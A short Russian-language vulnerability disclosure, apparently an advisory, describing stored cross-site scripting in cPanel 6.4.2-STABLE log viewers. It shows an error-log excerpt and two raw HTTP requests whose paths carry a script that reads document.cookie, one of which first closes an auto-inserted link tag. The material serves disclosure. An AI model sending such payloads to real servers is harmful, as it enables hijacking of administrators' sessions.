В запросы, остающиеся в логах cpanel, можно внедрить код, который будет отображен (выполнен) в броузере администратора при просмотре им логов. Пример лога:
[из errlog.html]
...
<b>Last 300 Error Log Messages in reverse order:</b><hr>
<pre>
[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
/home/dir/public_html/foobar.html
</pre>
...
Т.о. можно дать что-то типа следующего:
GET /<script>alert(document.cookie);</script> HTTP/1.0
Host: www.site.com
Для "Latest visitors" лога тестированной версии (6.4.2-STABLE) нужно предварительно закрыть тег <a>, который автоматом ставится для гиперссылок:
GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
Host: www.site.com
